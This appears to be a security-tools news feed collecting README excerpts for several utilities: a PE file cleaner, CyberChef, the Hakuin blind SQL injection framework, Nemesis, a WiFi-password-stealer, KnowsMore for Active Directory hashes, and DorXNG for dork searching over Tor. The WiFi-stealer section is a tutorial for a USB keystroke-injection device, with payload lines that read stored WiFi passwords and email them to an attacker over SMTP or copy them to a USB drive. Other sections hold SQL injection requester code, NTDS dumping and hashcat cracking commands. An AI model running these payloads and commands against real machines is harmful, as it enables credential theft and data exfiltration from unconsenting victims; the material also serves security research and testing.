FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add

By: Zion3R


file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively.


Features

  • PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers.

  • Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable.

  • Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine architecture, number of sections, timestamp, subsystem, image base, and section details.

  • File Cleaning: The core functionality of file-unpumper is to remove any "pumped" or padded data from a PE file, resulting in a cleaned version of the executable. This can aid in malware analysis, reverse engineering, or simply reducing the file size.

  • Parallel Processing: To ensure efficient performance, file-unpumper leverages the power of parallel processing using the rayon crate, allowing it to handle large files with ease.

  • Progress Tracking: During the file cleaning process, a progress bar is displayed, providing a visual indication of the operation's progress and estimated time remaining.

Installation

file-unpumper is written in Rust and can be easily installed using the Cargo package manager:

cargo install file-unpumper

Usage

  • <INPUT>: The path to the input PE file.

Options

  • --fix-headers: Fix and align the PE headers of the input file.
  • --extract-resources: Extract embedded resources from the input file.
  • --analyze-metadata: Analyze and display the PE file's metadata.
  • -h, --help: Print help information.
  • -V, --version: Print version information.

Examples

  1. Clean a PE file and remove any "pumped" data:

bash file-unpumper path/to/input.exe

  1. Fix the PE headers and analyze the metadata of a file:

bash file-unpumper --fix-headers --analyze-metadata path/to/input.exe

  1. Extract resources from a PE file:

bash file-unpumper --extract-resources path/to/input.exe

  1. Perform all available operations on a file:

bash file-unpumper --fix-headers --extract-resources --analyze-metadata path/to/input.exe

Contributing

Contributions to file-unpumper are welcome! If you encounter any issues or have suggestions for improvements, please open an issue or submit a pull request on the GitHub repository.

Changelog

The latest changelogs can be found in CHANGELOG.md

License

file-unpumper is released under the MIT License.



CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

By: Zion3R


CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

Containers

If you would like to try out CyberChef locally you can either build it yourself:

docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef

Or you can use our image directly:

docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

This image is built and published through our GitHub Workflows

How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like in simple or complex ways. Some examples are as follows:

Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 2GB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

Deep linking

By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

Supported arguments are recipe, input (encoded in Base64), and theme.

Browser support

CyberChef is built to support

  • Google Chrome 50+
  • Mozilla Firefox 38+

Node.js support

CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

Contributing

Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

  • Push your changes to your fork.
  • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
...

async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...

if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of password (length , lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup ️

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions ο“–

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output

Tips 

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. ο˜‰

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all. ο”ŽοŒŽ

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename, the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations seperate it's there for you.

Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet... ο˜‰ How many you run really depends on what you're doing. Each container uses approximately 1.25GBs of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.

When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).

Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... ο”ο˜‰

